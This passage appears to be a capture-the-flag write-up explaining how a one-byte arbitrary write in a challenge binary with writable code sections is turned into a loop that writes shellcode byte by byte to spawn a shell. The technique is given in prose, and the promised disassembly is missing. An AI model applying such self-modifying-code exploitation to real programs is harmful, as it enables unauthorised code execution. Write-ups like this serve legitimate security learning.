In main() right after the typical calls to setvbuf for STDIN and STDOUT we have a setup function.
What setup does is, it sets the permissions of the .text .data and .bss sections to read, write and execute.
The function after setup is butterflySwag. This function takes 2 input variables. An address and a 1 byte value. It writes the 1 byte value to the address we specify and returns.
So we have a 1 byte patch anywhere in the binary including the .text segment. Of course we can’t get a shell with just a single byte, so let’s make a way to get more bytes in there. Since one of following if statements are conveniently close to the code taking input and considering they are all short conditional jumps which are a 1 byte opcode 0x75 (for the JNE) followed by 1 byte signed char distance to jump we can patch the first if statement with a negative byte distance to jump back if byte != 0.
After calculating the negative distance to jump back, the disassembly looks like this:
Now that we can patch unlimited number of bytes while byte != 0 let’s write some shellcode byte by byte right after the conditional jump back and get out of this loop by sending byte == 0.